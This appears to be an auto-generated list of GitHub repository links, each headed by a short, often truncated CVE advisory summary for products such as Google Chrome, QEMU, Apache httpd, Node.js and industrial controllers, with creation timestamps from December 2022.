**A logged-in and authenticated user with a Reviewer Role may lock a content item. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23265](https://github.com/Live-Hack-CVE/CVE-2021-23265) create time: 2022-12-30T01:13:29Z

**Login with hash: The login routine allows the client to log in to the system not by using the password, but by using the hash of the password. Combined with CVE-2021-23858, this allows an attacker to subsequently login to the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23857](https://github.com/Live-Hack-CVE/CVE-2021-23857) create time: 2022-12-30T01:13:25Z

**On version 15.1.x before 15.1.3, 14.1.x before 14.1.3.1, and 13.1.x before 13.1.3.6, when the brute force protection feature of BIG-IP Advanced WAF or BIG-IP ASM is enabled on a virtual server and the virtual server is under brute force attack, the MySQL database may run out of disk space due to lack of row limit on un CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23053](https://github.com/Live-Hack-CVE/CVE-2021-23053) create time: 2022-12-30T01:13:21Z

**Exposure of System Data to an Unauthorized Control Sphere vulnerability in web UI of Argo CD allows attacker to cause leaked secret data into web UI error messages and logs. This issue affects Argo CD 1.8 versions prior to 1.8.7; 1.7 versions prior to 1.7.14. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23135](https://github.com/Live-Hack-CVE/CVE-2021-23135) create time: 2022-12-30T01:12:08Z

**On version 2.x before 2.0.3 and 1.x before 1.12.3, the command line restriction that controls snippet use with NGINX Ingress Controller does not apply to Ingress objects. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23055](https://github.com/Live-Hack-CVE/CVE-2021-23055) create time: 2022-12-30T01:12:05Z

**The affected product is vulnerable to an improper access control, which may allow an authenticated user to gain unauthorized access to sensitive data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23173](https://github.com/Live-Hack-CVE/CVE-2021-23173) create time: 2022-12-30T01:12:01Z

**The web application on Agilia Link+ version 3.0 implements authentication and session management mechanisms exclusively on the client-side and does not protect authentication attributes sufficiently. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23196](https://github.com/Live-Hack-CVE/CVE-2021-23196) create time: 2022-12-30T01:11:58Z

**Information disclosure: The main configuration, including users and their hashed passwords, is exposed by an unprotected web server resource and can be accessed without authentication. Additionally, device details are exposed which include the serial number and the firmware version by another unprotected web server res CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23858](https://github.com/Live-Hack-CVE/CVE-2021-23858) create time: 2022-12-30T01:11:08Z

**By executing a special command, an user with administrative rights can get access to extended debug functionality on the VRM allowing an impact on integrity or availability of the installed software. This issue also affects installations of the DIVAR IP and BVMS with VRM installed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23861](https://github.com/Live-Hack-CVE/CVE-2021-23861) create time: 2022-12-30T01:11:04Z

**A crafted configuration packet sent by an authenticated administrative user can be used to execute arbitrary commands in system context. This issue also affects installations of the VRM, DIVAR IP, BVMS with VRM installed, the VIDEOJET decoder (VJD-7513 and VJD-8000). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23862](https://github.com/Live-Hack-CVE/CVE-2021-23862) create time: 2022-12-30T01:11:00Z

**A flaw was found in the Linux kernel’s implementation of reading the SVC RDMA counters. Reading the counter sysctl panics the system. This flaw allows a local attacker with local access to cause a denial of service while the system reboots. The issue is specific to CentOS/RHEL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4218](https://github.com/Live-Hack-CVE/CVE-2021-4218) create time: 2022-12-30T01:10:57Z

**curl 7.7 through 7.76.1 suffers from an information disclosure when the `-t` command line option, known as `CURLOPT_TELNETOPTIONS` in libcurl, is used to send variable=content pairs to TELNET servers. Due to a flaw in the option parser for sending NEW_ENV variables, libcurl could be made to pass on uninitialized data f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22898](https://github.com/Live-Hack-CVE/CVE-2021-22898) create time: 2022-12-30T01:10:46Z

**An information disclosure vulnerability exists in the Rocket.Chat server fixed v3.13, v3.12.2 & v3.11.3 that allowed email addresses to be disclosed by enumeration and validation checks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22892](https://github.com/Live-Hack-CVE/CVE-2021-22892) create time: 2022-12-30T01:10:43Z

**A buffer overflow vulnerability exists in Pulse Connect Secure before 9.1R11.4 allows a remote authenticated attacker to execute arbitrary code as the root user via maliciously crafted meeting room. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22894](https://github.com/Live-Hack-CVE/CVE-2021-22894) create time: 2022-12-30T01:10:39Z

**A floating point exception (divide-by-zero) issue was discovered in SoX in functon startread() of wav.c file. An attacker with a crafted wav file, could cause an application to crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33844](https://github.com/Live-Hack-CVE/CVE-2021-33844) create time: 2022-12-30T01:10:08Z

**A floating point exception (divide-by-zero) issue was discovered in SoX in functon read_samples() of voc.c file. An attacker with a crafted file, could cause an application to crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23210](https://github.com/Live-Hack-CVE/CVE-2021-23210) create time: 2022-12-30T01:10:04Z

**A vulnerability was found in SoX, where a heap-buffer-overflow occurs in function startread() in hcom.c file. The vulnerability is exploitable with a crafted hcomn file, that could cause an application to crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23172](https://github.com/Live-Hack-CVE/CVE-2021-23172) create time: 2022-12-30T01:10:01Z

**Owl Labs Meeting Owl 5.2.0.15 allows attackers to deactivate the passcode protection mechanism via a certain c 11 message. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31461](https://github.com/Live-Hack-CVE/CVE-2022-31461) create time: 2022-12-30T01:16:05Z

**A authenticated remote command injection vulnerability was discovered in Aruba ClearPass Policy Manager version(s): 6.10.4 and below, 6.9.9 and below, 6.8.9-HF2 and below, 6.7.x and below. Aruba has released updates to ClearPass Policy Manager that address this security vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23663](https://github.com/Live-Hack-CVE/CVE-2022-23663) create time: 2022-12-30T01:15:10Z

**Certain 5400 RPM hard drives, for laptops and other PCs in approximately 2005 and later, allow physically proximate attackers to cause a denial of service (device malfunction and system crash) via a resonant-frequency attack with the audio signal from the Rhythm Nation music video. A reported product is Seagate STDT400 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38392](https://github.com/Live-Hack-CVE/CVE-2022-38392) create time: 2022-12-30T01:15:07Z

**Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35796](https://github.com/Live-Hack-CVE/CVE-2022-35796) create time: 2022-12-30T01:14:59Z

**Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33636](https://github.com/Live-Hack-CVE/CVE-2022-33636) create time: 2022-12-30T01:14:56Z

**Use after free in Views in Google Chrome prior to 103.0.5060.134 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via UI interaction. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2481](https://github.com/Live-Hack-CVE/CVE-2022-2481) create time: 2022-12-30T01:14:52Z

**Use after free in Service Worker API in Google Chrome prior to 103.0.5060.134 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2480](https://github.com/Live-Hack-CVE/CVE-2022-2480) create time: 2022-12-30T01:14:48Z

**Insufficient validation of untrusted input in File in Google Chrome on Android prior to 103.0.5060.134 allowed an attacker who convinced a user to install a malicious app to obtain potentially sensitive information from internal file directories via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2479](https://github.com/Live-Hack-CVE/CVE-2022-2479) create time: 2022-12-30T01:14:44Z

**Use after free in Guest View in Google Chrome prior to 103.0.5060.134 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2477](https://github.com/Live-Hack-CVE/CVE-2022-2477) create time: 2022-12-30T01:14:29Z

**There is a code injection vulnerability in Esri Portal for ArcGIS versions 10.8.1 and below that may allow a remote, unauthenticated attacker to pass strings which could potentially cause arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38193](https://github.com/Live-Hack-CVE/CVE-2022-38193) create time: 2022-12-30T01:14:25Z

**Use after free in storage in Google Chrome prior to 100.0.4896.88 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1312](https://github.com/Live-Hack-CVE/CVE-2022-1312) create time: 2022-12-30T01:13:10Z

**Type confusion in V8 in Google Chrome prior to 100.0.4896.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1314](https://github.com/Live-Hack-CVE/CVE-2022-1314) create time: 2022-12-30T01:13:05Z

**Use after free in shell in Google Chrome on ChromeOS prior to 100.0.4896.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1311](https://github.com/Live-Hack-CVE/CVE-2022-1311) create time: 2022-12-30T01:13:02Z

**Use after free in Vulkan in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1477](https://github.com/Live-Hack-CVE/CVE-2022-1477) create time: 2022-12-30T01:12:58Z

**Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1364](https://github.com/Live-Hack-CVE/CVE-2022-1364) create time: 2022-12-30T01:12:54Z

**Use after free in tab groups in Google Chrome prior to 100.0.4896.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1313](https://github.com/Live-Hack-CVE/CVE-2022-1313) create time: 2022-12-30T01:12:50Z

**Use after free in ANGLE in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1479](https://github.com/Live-Hack-CVE/CVE-2022-1479) create time: 2022-12-30T01:12:46Z

**Use after free in SwiftShader in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1478](https://github.com/Live-Hack-CVE/CVE-2022-1478) create time: 2022-12-30T01:12:42Z

**Use after free in BFCache in Google Chrome prior to 100.0.4896.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1308](https://github.com/Live-Hack-CVE/CVE-2022-1308) create time: 2022-12-30T01:12:38Z

**Inappropriate implementation in compositing in Google Chrome prior to 100.0.4896.88 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1306](https://github.com/Live-Hack-CVE/CVE-2022-1306) create time: 2022-12-30T01:12:19Z

**Insufficient policy enforcement in developer tools in Google Chrome prior to 100.0.4896.88 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1309](https://github.com/Live-Hack-CVE/CVE-2022-1309) create time: 2022-12-30T01:12:16Z

**Inappropriate implementation in full screen in Google Chrome on Android prior to 100.0.4896.88 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1307](https://github.com/Live-Hack-CVE/CVE-2022-1307) create time: 2022-12-30T01:12:12Z

**Use after free in regular expressions in Google Chrome prior to 100.0.4896.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1310](https://github.com/Live-Hack-CVE/CVE-2022-1310) create time: 2022-12-30T01:11:54Z

**Use after free in storage in Google Chrome prior to 100.0.4896.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1305](https://github.com/Live-Hack-CVE/CVE-2022-1305) create time: 2022-12-30T01:11:50Z

**Heap buffer overflow in Web UI Settings in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1484](https://github.com/Live-Hack-CVE/CVE-2022-1484) create time: 2022-12-30T01:11:46Z

**Use after free in Sharing in Google Chrome on Mac prior to 101.0.4951.41 allowed a remote attacker who convinced a user to engage in specific user interaction to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1481](https://github.com/Live-Hack-CVE/CVE-2022-1481) create time: 2022-12-30T01:11:42Z

**Inappropriate implementation in WebGL in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1482](https://github.com/Live-Hack-CVE/CVE-2022-1482) create time: 2022-12-30T01:11:38Z

**Type confusion in V8 in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1486](https://github.com/Live-Hack-CVE/CVE-2022-1486) create time: 2022-12-30T01:11:19Z

**Heap buffer overflow in WebGPU in Google Chrome prior to 101.0.4951.41 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1483](https://github.com/Live-Hack-CVE/CVE-2022-1483) create time: 2022-12-30T01:11:15Z

**AutomationDirect DirectLOGIC is vulnerable to a specifically crafted serial message to the CPU serial port that will cause the PLC to respond with the PLC password in cleartext. This could allow an attacker to access and make unauthorized changes. This issue affects: AutomationDirect DirectLOGIC D0-06 series CPUs D0-06 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2003](https://github.com/Live-Hack-CVE/CVE-2022-2003) create time: 2022-12-29T22:24:55Z

**AutomationDirect DirectLOGIC is vulnerable to a a specially crafted packet can be sent continuously to the PLC to prevent access from DirectSoft and other devices, causing a denial-of-service condition. This issue affects: AutomationDirect DirectLOGIC D0-06 series CPUs D0-06DD1 versions prior to 2.72; D0-06DD2 versions CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2004](https://github.com/Live-Hack-CVE/CVE-2022-2004) create time: 2022-12-29T22:25:02Z

**AutomationDirect C-more EA9 HTTP webserver uses an insecure mechanism to transport credentials from client to web server, which may allow an attacker to obtain the login credentials and login as a valid user. This issue affects: AutomationDirect C-more EA9 EA9-T6CL versions prior to 6.73; EA9-T6CL-R versions prior to 6 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2005](https://github.com/Live-Hack-CVE/CVE-2022-2005) create time: 2022-12-29T22:24:59Z

**AutomationDirect DirectLOGIC has a DLL vulnerability in the install directory that may allow an attacker to execute code during the installation process. This issue affects: AutomationDirect C-more EA9 EA9-T6CL versions prior to 6.73; EA9-T6CL-R versions prior to 6.73; EA9-T7CL versions prior to 6.73; EA9-T7CL-R versio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2006](https://github.com/Live-Hack-CVE/CVE-2022-2006) create time: 2022-12-29T22:25:06Z

**mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-1191](https://github.com/Live-Hack-CVE/CVE-2009-1191) create time: 2022-12-29T22:21:51Z

**Untrusted search path vulnerability in the pthread_win32_process_attach_np function in pthreadGC2.dll in Pthreads-win32 2.8.0 allows local users to gain privileges via a Trojan horse quserex.dll file in the current working directory. NOTE: some of these details are obtained from third party information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-5250](https://github.com/Live-Hack-CVE/CVE-2010-5250) create time: 2022-12-29T22:27:34Z

**The cache_merge_headers_out function in modules/cache/cache_util.c in the mod_cache module in the Apache HTTP Server before 2.4.11 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty HTTP Content-Type header. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-3581](https://github.com/Live-Hack-CVE/CVE-2014-3581) create time: 2022-12-29T22:21:47Z

**mod_lua.c in the mod_lua module in the Apache HTTP Server 2.3.x and 2.4.x through 2.4.10 does not support an httpd configuration in which the same Lua authorization provider is used with different arguments within different contexts, which allows remote attackers to bypass intended access restrictions in opportunistic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-8109](https://github.com/Live-Hack-CVE/CVE-2014-8109) create time: 2022-12-29T22:21:27Z

**Apache HTTP Server, in all releases prior to 2.2.32 and 2.4.25, was liberal in the whitespace accepted from requests and sent in response lines and headers. Accepting these different behaviors represented a security concern when httpd participates in any chain of proxies or interacts with back-end application servers, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-8743](https://github.com/Live-Hack-CVE/CVE-2016-8743) create time: 2022-12-29T22:21:34Z

**The Apache HTTP Server through 2.4.23 follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a cr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-5387](https://github.com/Live-Hack-CVE/CVE-2016-5387) create time: 2022-12-29T22:21:30Z

**A vulnerability, was found in legacy Axis devices such as P3225 and M3005. This affects an unknown part of the component CGI Script. The manipulation leads to improper privilege management. It is possible to initiate the attack remotely. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20049](https://github.com/Live-Hack-CVE/CVE-2017-20049) create time: 2022-12-29T22:20:09Z

**A race condition flaw was found in the 9pfs server implementation of QEMU up to and including 5.2.0. This flaw allows a malicious 9p client to cause a use-after-free error, potentially escalating their privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity as well as syste CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20181](https://github.com/Live-Hack-CVE/CVE-2021-20181) create time: 2022-12-29T22:59:10Z

**Node.js: All versions prior to Node.js 6.15.0, 8.14.0, 10.14.0 and 11.3.0: Denial of Service with large HTTP headers: By using a combination of many requests with maximum sized headers (almost 80 KB per connection), and carefully timed completion of the headers, it is possible to cause the HTTP server to abort from hea CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-12121](https://github.com/Live-Hack-CVE/CVE-2018-12121) create time: 2022-12-29T22:27:30Z

**Node.js: All versions prior to Node.js 6.15.0, 8.14.0, 10.14.0 and 11.3.0: Hostname spoofing in URL parser for javascript protocol: If a Node.js application is using url.parse() to determine the URL hostname, that hostname can be spoofed by using a mixed case "javascript:" (e.g. "javAscript:") protocol (other protocols CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-12123](https://github.com/Live-Hack-CVE/CVE-2018-12123) create time: 2022-12-29T22:27:22Z

**Node.js: All versions prior to Node.js 6.15.0, 8.14.0, 10.14.0 and 11.3.0: Slowloris HTTP Denial of Service: An attacker can cause a Denial of Service (DoS) by sending headers very slowly keeping HTTP or HTTPS connections and associated resources alive for a long period of time. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-12122](https://github.com/Live-Hack-CVE/CVE-2018-12122) create time: 2022-12-29T22:27:19Z

**Node.js: All versions prior to Node.js 6.15.0: Debugger port 5858 listens on any interface by default: When the debugger is enabled with `node --debug` or `node debug`, it listens to port 5858 on all interfaces by default. This may allow remote computers to attach to the debug port and evaluate arbitrary JavaScript. Th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-12120](https://github.com/Live-Hack-CVE/CVE-2018-12120) create time: 2022-12-29T22:27:15Z

**In Apache httpd 2.2.0 to 2.4.29, when generating an HTTP Digest authentication challenge, the nonce sent to prevent reply attacks was not correctly generated using a pseudo-random seed. In a cluster of servers using a common Digest authentication configuration, HTTP requests could be replayed across servers by an attac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1312](https://github.com/Live-Hack-CVE/CVE-2018-1312) create time: 2022-12-29T22:21:23Z

**An untrusted deserialization was found in the org.apache.xmlrpc.parser.XmlRpcResponseParser:addResult method of Apache XML-RPC (aka ws-xmlrpc) library. A malicious XML-RPC server could target a XML-RPC client causing it to execute arbitrary code. Apache XML-RPC is no longer maintained and this issue will not be fixed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17570](https://github.com/Live-Hack-CVE/CVE-2019-17570) create time: 2022-12-29T23:04:59Z

**A CWE-287: Authentication vulnerability exists in spaceLYnk (all versions before 2.4.0) and Wiser for KNX (all versions before 2.4.0 - formerly known as homeLYnk), which could cause loss of control when an attacker bypasses the authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6832](https://github.com/Live-Hack-CVE/CVE-2019-6832) create time: 2022-12-29T23:04:40Z

**A CWE-427: Uncontrolled Search Path Element vulnerability exists in ProClima (all versions prior to version 8.0.0) which could allow a malicious DLL file, with the same name of any resident DLLs inside the software installation, to execute arbitrary code in all versions of ProClima prior to version 8.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6825](https://github.com/Live-Hack-CVE/CVE-2019-6825) create time: 2022-12-29T23:04:33Z

**A CWE-287: Improper Authentication vulnerability exists in the NET55XX Encoder with firmware prior to version 2.1.9.7 which could cause impact to confidentiality, integrity, and availability when a remote attacker crafts a malicious request to the encoder webUI. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6814](https://github.com/Live-Hack-CVE/CVE-2019-6814) create time: 2022-12-29T23:03:54Z

**A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in BMXNOR0200H Ethernet / Serial RTU module (all firmware versions), which could cause disconnection of active connections when an unusually high number of IEC 60870- 5-104 packets are received by the module on port 2404/TCP. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6831](https://github.com/Live-Hack-CVE/CVE-2019-6831) create time: 2022-12-29T23:03:50Z

**A NULL pointer dereference flaw was found in the floppy disk emulator of QEMU. This issue occurs while processing read/write ioport commands if the selected floppy drive is not initialized with a block device. This flaw allows a privileged guest user to crash the QEMU process on the host, resulting in a denial of servi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20196](https://github.com/Live-Hack-CVE/CVE-2021-20196) create time: 2022-12-29T22:58:39Z

**A vulnerability was found in Apache HTTP Server 2.4.34 to 2.4.38. When HTTP/2 was enabled for a http: host or H2Upgrade was enabled for h2 on a https: host, an Upgrade request from http/1.1 to http/2 that was not the first request on a connection could lead to a misconfiguration and crash. Server that never enabled the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-0197](https://github.com/Live-Hack-CVE/CVE-2019-0197) create time: 2022-12-29T22:21:37Z

**A CWE-284: Improper Access Control vulnerability exists in EcoStruxureª and SmartStruxureª Power Monitoring and SCADA Software (see security notification for version information) that could allow a user the ability to perform actions via the web interface at a higher privilege level. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7547](https://github.com/Live-Hack-CVE/CVE-2020-7547) create time: 2022-12-29T23:04:36Z

**A CWE-284 Improper Access Control vulnerability exists in EcoStruxure Building Operation WebReports V1.9 - V3.1 that could cause a remote attacker being able to access a restricted web resources due to improper access control. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7573](https://github.com/Live-Hack-CVE/CVE-2020-7573) create time: 2022-12-29T23:04:26Z

**A CWE-284:Improper Access Control vulnerability exists in EcoStruxureª and SmartStruxureª Power Monitoring and SCADA Software (see security notification for version information) that could allow for arbitrary code execution on the server when an authorized user access an affected webpage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7545](https://github.com/Live-Hack-CVE/CVE-2020-7545) create time: 2022-12-29T23:04:01Z

**A CWE-285 Improper Authorization vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows improper access to executable code folders. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7530](https://github.com/Live-Hack-CVE/CVE-2020-7530) create time: 2022-12-29T23:03:58Z

**libubox in OpenWrt before 18.06.7 and 19.x before 19.07.1 has a tagged binary data JSON serialization vulnerability that may cause a stack based buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7248](https://github.com/Live-Hack-CVE/CVE-2020-7248) create time: 2022-12-29T23:03:15Z

**An issue was discovered in the ALFA Windows 10 driver 6.1316.1209 for AWUS036H. The WEP, WPA, WPA2, and WPA3 implementations accept plaintext frames in a protected Wi-Fi network. An adversary can abuse this to inject arbitrary data frames independent of the network configuration. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26140](https://github.com/Live-Hack-CVE/CVE-2020-26140) create time: 2022-12-29T23:03:12Z

**A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5135](https://github.com/Live-Hack-CVE/CVE-2020-5135) create time: 2022-12-29T23:02:09Z

**A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execut CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9883](https://github.com/Live-Hack-CVE/CVE-2020-9883) create time: 2022-12-29T23:01:54Z

**A buffer overflow in the web server of Flexense DupScout Enterprise 10.0.18 allows a remote anonymous attacker to execute code as SYSTEM by overflowing the sid parameter via a GET /settings&sid= attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29659](https://github.com/Live-Hack-CVE/CVE-2020-29659) create time: 2022-12-29T23:01:50Z

**A heap-based buffer over write vulnerability was found in GhostScript's lp8000_print_page() function in gdevlp8k.c file. An attacker could trick a user to open a crafted PDF file, triggering the heap buffer overflow that could lead to memory corruption or a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27792](https://github.com/Live-Hack-CVE/CVE-2020-27792) create time: 2022-12-29T23:01:29Z

**This affects all versions of package npm-help. The injection point is located in line 13 in index.js file in export.latestVersion() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28445](https://github.com/Live-Hack-CVE/CVE-2020-28445) create time: 2022-12-29T23:01:22Z

**A reachable assertion issue was found in the USB EHCI emulation code of QEMU. It could occur while processing USB requests due to missing handling of DMA memory map failure. A malicious privileged user within the guest may abuse this flaw to send bogus USB requests and crash the QEMU process on the host, resulting in a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25723](https://github.com/Live-Hack-CVE/CVE-2020-25723) create time: 2022-12-29T22:59:43Z

**hw/net/e1000e_core.c in QEMU 5.0.0 has an infinite loop via an RX descriptor with a NULL buffer address. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28916](https://github.com/Live-Hack-CVE/CVE-2020-28916) create time: 2022-12-29T22:59:40Z

**A flaw was found in the memory management API of QEMU during the initialization of a memory region cache. This issue could lead to an out-of-bounds write access to the MSI-X table while performing MMIO operations. A guest user may abuse this flaw to crash the QEMU process on the host, resulting in a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27821](https://github.com/Live-Hack-CVE/CVE-2020-27821) create time: 2022-12-29T22:59:37Z

**ide_atapi_cmd_reply_end in hw/ide/atapi.c in QEMU 5.1.0 allows out-of-bounds read access because a buffer index is not validated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29443](https://github.com/Live-Hack-CVE/CVE-2020-29443) create time: 2022-12-29T22:59:33Z

**An integer overflow issue was found in the vmxnet3 NIC emulator of the QEMU for versions up to v5.2.0. It may occur if a guest was to supply invalid values for rx/tx queue size or other NIC parameters. A privileged guest user may use this flaw to crash the QEMU process on the host resulting in DoS scenario. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20203](https://github.com/Live-Hack-CVE/CVE-2021-20203) create time: 2022-12-29T22:59:30Z

**In gcc, an internal compiler error in match_reload function at lra-constraints.c may cause a crash through a crafted input file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35536](https://github.com/Live-Hack-CVE/CVE-2020-35536) create time: 2022-12-29T22:28:15Z

**In gcc, a crafted input source file could cause g++ to crash during compilation when provided certain optimization flags. The problem resides in the ipcp_store_vr_results function in gcc/ipa-cp.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35537](https://github.com/Live-Hack-CVE/CVE-2020-35537) create time: 2022-12-29T22:26:00Z

